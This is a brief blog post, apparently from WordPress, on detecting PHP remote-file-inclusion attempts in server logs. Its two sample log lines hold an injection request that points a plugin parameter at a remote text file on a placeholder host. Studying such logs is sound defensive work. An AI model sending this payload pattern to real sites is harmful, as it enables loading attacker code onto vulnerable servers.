How to find PHP injection through logs

URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)

Request —– IP attacked —— IP of attacker

————————————————————————————————

Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:02 -0500] “GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1″ 500 3572 “-” “Mozilla/5.0″ SesohkAx1jYAAFNIEg0 “-“

Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:03 -0500] “GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1″ 500 3572 “-” “Mozilla/5.0″ Sesoh0Ax1jYAAFN@Eng “-“

————————————————————————————————

About these ads
About

anees

Posted in Issues, Scripts, Server Security
One comment on “How to find PHP injection through logs
  1. Thank you for some other magnificent post. Where else may just anyone get that kind of info in such a perfect means of writing? I’ve a presentation next week, and I am at the search for such info.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog Stats
  • 121,341 hits
Follow

Get every new post delivered to your Inbox.

Join 211 other followers

%d bloggers like this: